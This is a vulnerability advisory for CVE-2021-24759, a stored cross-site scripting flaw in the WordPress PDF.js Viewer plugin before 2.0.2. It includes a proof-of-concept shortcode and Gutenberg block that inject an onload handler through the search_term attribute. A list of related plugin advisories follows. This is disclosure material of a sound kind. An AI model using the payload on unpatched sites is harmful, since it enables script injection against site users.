PDF.js Viewer < 2.0.2 – Contributor+ Stored Cross-Site Scripting | CVE 2021-24759 | Plugin Vulnerabilities

Description

The plugin does not escape some of its shortcode and Gutenberg Block attributes, which could allow users with a role as low as Contributor to to perform Cross-Site Scripting attacks

Proof of Concept

[pdfjs-viewer search_term='" onload="alert(/XSS/)']

<!-- wp:pdfjsblock/pdfjs-embed {"searchText":"this is ignored"} -->
<div class="wp-block-pdfjsblock-pdfjs-embed pdfjs-wrapper">[pdfjs-viewer viewer_width=0 viewer_height=800 url=undefined download=true print=true fullscreen=false fullscreen_target=false fullscreen_text="on" zoom=0 search_term='" onload="alert(/XSS/)' ]</div>
<!-- /wp:pdfjsblock/pdfjs-embed -->

Affects Plugins

pdfjs-viewer-shortcode

Fixed in 2.0.2

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

apple502j

Submitter

apple502j

Verified

Yes

WPVDB ID

38274ef2-5100-4669-9544-a42346b6727d

Timeline

Publicly Published

2021-11-08 (about 2 years ago)

Added

2021-11-08 (about 2 years ago)

Last Updated

2022-04-11 (about 2 years ago)

Other

Published

Title

Published

2023-04-17

Title

Mega Addons For WPBakery Page Builder < 4.3.0 - Contributor+ Stored XSS

Published

2023-12-27

Title

Themify Icons < 2.0.2 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2023-12-05

Title

Smart External Link Click Monitor [Link Log] <= 5.0.2 - Reflected Cross-Site Scripting

Published

2023-08-14

Title

User Submitted Posts < 20230811 - Unauthenticated Stored XSS

Published

2012-05-15

Title

Track That Stat < 1.1.0 - Cross Site Scripting